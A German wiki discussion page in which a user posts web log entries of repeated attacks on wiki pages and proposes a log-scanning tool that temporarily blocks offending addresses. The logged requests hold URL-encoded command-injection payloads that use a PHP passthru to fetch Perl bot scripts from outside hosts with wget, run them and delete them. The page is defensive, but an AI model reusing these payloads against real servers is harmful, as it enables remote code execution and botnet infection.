es ist zugeben kleinlich aber mich nervt es. Die Analyse der Logfile ist etwas unübersichtlicher.

Schaut mal hier LiNux/SicherHeit/NetzWerk/AttaKen

und hier z.B.

1105348507443295        VIEWPAGE        pagename=LinuxPerf%26rush%3Decho+START+%3B+cd%2Ftmp%3Bmkdir+.temp22%3Bcd+.temp22%3Bwget+http%3A%2Fwww.quasi-sane.com%2Fpics%2Fbot.htm%3Bwget+http%3A%2Fweblicious.com%2F.notes%2Fssh2.htm%3Bperl+ssh2.htm%3Brm+ssh.htm%3Bperl+bot.htm%3Brm+bot.htm%3B+echo+END+%26highlight%3D%2527.passthru%28%24HTTP+GET+VARS%5Brush%5D%29.%2527%27%3B&HTTP_USER_AGENT=LWP%3A%3ASimple%2F5.65&REMOTE_ADDR=69.44.153.50
1105348503585416        VIEWPAGE        pagename=LinuxPerf%26rush%3Decho+START+%3B+cd%2Ftmp%3Bmkdir+.temp22%3Bcd+.temp22%3Bwget+http%3A%2Fwww.quasi-sane.com%2Fpics%2Fbot.htm%3Bwget+http%3A%2Fweblicious.com%2F.notes%2Fssh2.htm%3Bperl+ssh2.htm%3Brm+ssh.htm%3Bperl+bot.htm%3Brm+bot.htm%3B+echo+END+%26highlight%3D%2527.passthru%28%24HTTP+GET+VARS%5Brush%5D%29.%2527%27%3B&HTTP_USER_AGENT=LWP%3A%3ASimple%2F5.803&REMOTE_ADDR=66.98.220.74
1105348465581235        VIEWPAGE        pagename=Mp3Spieler%26rush%3Decho+START+%3B+cd%2Ftmp%3Bmkdir+.temp22%3Bcd+.temp22%3Bwget+http%3A%2Fwww.quasi-sane.com%2Fpics%2Fbot.htm%3Bwget+http%3A%2Fweblicious.com%2F.notes%2Fssh2.htm%3Bperl+ssh2.htm%3Brm+ssh.htm%3Bperl+bot.htm%3Brm+bot.htm%3B+echo+END+%26highlight%3D%2527.passthru%28%24HTTP+GET+VARS%5Brush%5D%29.%2527%27%3B&HTTP_USER_AGENT=LWP%3A%3ASimple%2F5.48&REMOTE_ADDR=212.112.233.130
1105348425380883        VIEWPAGE        pagename=LinuxPerf%26rush%3Decho+START+%3B+cd%2Ftmp%3Bmkdir+.temp22%3Bcd+.temp22%3Bwget+http%3A%2Fwww.quasi-sane.com%2Fpics%2Fbot.htm%3Bwget+http%3A%2Fweblicious.com%2F.notes%2Fssh2.htm%3Bperl+ssh2.htm%3Brm+ssh.htm%3Bperl+bot.htm%3Brm+bot.htm%3B+echo+END+%26highlight%3D%2527.passthru%28%24HTTP+GET+VARS%5Brush%5D%29.%2527%27%3B&HTTP_USER_AGENT=LWP%3A%3ASimple%2F5.803&REMOTE_ADDR=64.191.60.135
1105348362118666        VIEWPAGE        pagename=LinuxPerf%26rush%3Decho+START+%3B+cd%2Ftmp%3Bmkdir+.temp22%3Bcd+.temp22%3Bwget+http%3A%2Fwww.quasi-sane.com%2Fpics%2Fbot.htm%3Bwget+http%3A%2Fweblicious.com%2F.notes%2Fssh2.htm%3Bperl+ssh2.htm%3Brm+ssh.htm%3Bperl+bot.htm%3Brm+bot.htm%3B+echo+END+%26highlight%3D%2527.passthru%28%24HTTP+GET+VARS%5Brush%5D%29.%2527%27%3B&HTTP_USER_AGENT=LWP%3A%3ASimple%2F5.64&REMOTE_ADDR=217.20.113.119
1105348297160337        VIEWPAGE        pagename=Mp3Spieler%26rush%3Decho+START+%3B+cd%2Ftmp%3Bmkdir+.temp22%3Bcd+.temp22%3Bwget+http%3A%2Fwww.quasi-sane.com%2Fpics%2Fbot.htm%3Bwget+http%3A%2Fweblicious.com%2F.notes%2Fssh2.htm%3Bperl+ssh2.htm%3Brm+ssh.htm%3Bperl+bot.htm%3Brm+bot.htm%3B+echo+END+%26highlight%3D%2527.passthru%28%24HTTP+GET+VARS%5Brush%5D%29.%2527%27%3B&HTTP_USER_AGENT=LWP%3A%3ASimple%2F5.803&REMOTE_ADDR=66.79.176.210


oder 
105348503585416        VIEWPAGE        pagename=LinuxPerf%26rush%3Decho+START+%3B+cd%2Ftmp%3Bmkdir+.temp22%3Bcd+.temp22%3Bwget+http%3A%2Fwww.quasi-sane.com%2Fpics%2Fbot.htm%3Bwget+http%3A%2Fweblicious.com%2F.notes%2Fssh2.htm%3Bperl+ssh2.htm%3Brm+ssh.htm%3Bperl+bot.htm%3Brm+bot.htm%3B+echo+END+%26highlight%3D%2527.passthru%28%24HTTP+GET+VARS%5Brush%5D%29.%2527%27%3B&HTTP_USER_AGENT=LWP%3A%3ASimple%2F5.803&REMOTE_ADDR=66.98.220.74
1105348465581235        VIEWPAGE        pagename=Mp3Spieler%26rush%3Decho+START+%3B+cd%2Ftmp%3Bmkdir+.temp22%3Bcd+.temp22%3Bwget+http%3A%2Fwww.quasi-sane.com%2Fpics%2Fbot.htm%3Bwget+http%3A%2Fweblicious.com%2F.notes%2Fssh2.htm%3Bperl+ssh2.htm%3Brm+ssh.htm%3Bperl+bot.htm%3Brm+bot.htm%3B+echo+END+%26highlight%3D%2527.passthru%28%24HTTP+GET+VARS%5Brush%5D%29.%2527%27%3B&HTTP_USER_AGENT=LWP%3A%3ASimple%2F5.48&REMOTE_ADDR=212.112.233.130
1105348425380883        VIEWPAGE        pagename=LinuxPerf%26rush%3Decho+START+%3B+cd%2Ftmp%3Bmkdir+.temp22%3Bcd+.temp22%3Bwget+http%3A%2Fwww.quasi-sane.com%2Fpics%2Fbot.htm%3Bwget+http%3A%2Fweblicious.com%2F.notes%2Fssh2.htm%3Bperl+ssh2.htm%3Brm+ssh.htm%3Bperl+bot.htm%3Brm+bot.htm%3B+echo+END+%26highlight%3D%2527.passthru%28%24HTTP+GET+VARS%5Brush%5D%29.%2527%27%3B&HTTP_USER_AGENT=LWP%3A%3ASimple%2F5.803&REMOTE_ADDR=64.191.60.135
1105348362118666        VIEWPAGE        pagename=LinuxPerf%26rush%3Decho+START+%3B+cd%2Ftmp%3Bmkdir+.temp22%3Bcd+.temp22%3Bwget+http%3A%2Fwww.quasi-sane.com%2Fpics%2Fbot.htm%3Bwget+http%3A%2Fweblicious.com%2F.notes%2Fssh2.htm%3Bperl+ssh2.htm%3Brm+ssh.htm%3Bperl+bot.htm%3Brm+bot.htm%3B+echo+END+%26highlight%3D%2527.passthru%28%24HTTP+GET+VARS%5Brush%5D%29.%2527%27%3B&HTTP_USER_AGENT=LWP%3A%3ASimple%2F5.64&REMOTE_ADDR=217.20.113.119
1105348297160337        VIEWPAGE        pagename=Mp3Spieler%26rush%3Decho+START+%3B+cd%2Ftmp%3Bmkdir+.temp22%3Bcd+.temp22%3Bwget+http%3A%2Fwww.quasi-sane.com%2Fpics%2Fbot.htm%3Bwget+http%3A%2Fweblicious.com%2F.notes%2Fssh2.htm%3Bperl+ssh2.htm%3Brm+ssh.htm%3Bperl+bot.htm%3Brm+bot.htm%3B+echo+END+%26highlight%3D%2527.passthru%28%24HTTP+GET+VARS%5Brush%5D%29.%2527%27%3B&HTTP_USER_AGENT=LWP%3A%3ASimple%2F5.803&REMOTE_ADDR=66.79.176.210

also allgemein ein tool für logfiles -> cron -> files testen auf "badwords" und über eine Negativliste und gute Jungs Spammer etc. für eine gewisse Zeit sperren. Protokoll wer wurde wann gesperrt, ist die Adresse eine dynamische etc.

ev die zuständigen Admins gleich mit E-Mail zumachen

antispam.py Zeile 177 Danke sehe ich mir an

antispam verhindert das schreiben von Seiten, nicht ? Ich möchte aber einen "Schutz" von mehrfachen Aufrufen nicht existenter Seiten mit einem DROP für eine gewissen Zeit. OK?

war mir vorher gar nicht aufgefallen sind immer die LinuxPerf und mp3player gewesen , er hat eine idee?

richtig wäre doch Page.py oder

# new page?
        if not self.exists() and self.default_formatter and not content_only:
            self._emptyPageText(request)
        elif not request.user.may.read(self.page_name):
            request.write("<strong>%s</strong><br>" % _("You are not allowed to view this page."))
        else:

-- DetlevLengsfeld 2006-11-27 11:32:42

Kategorie/Python

Python/WiKi/Attacken (last modified 2008-11-04 07:00:04)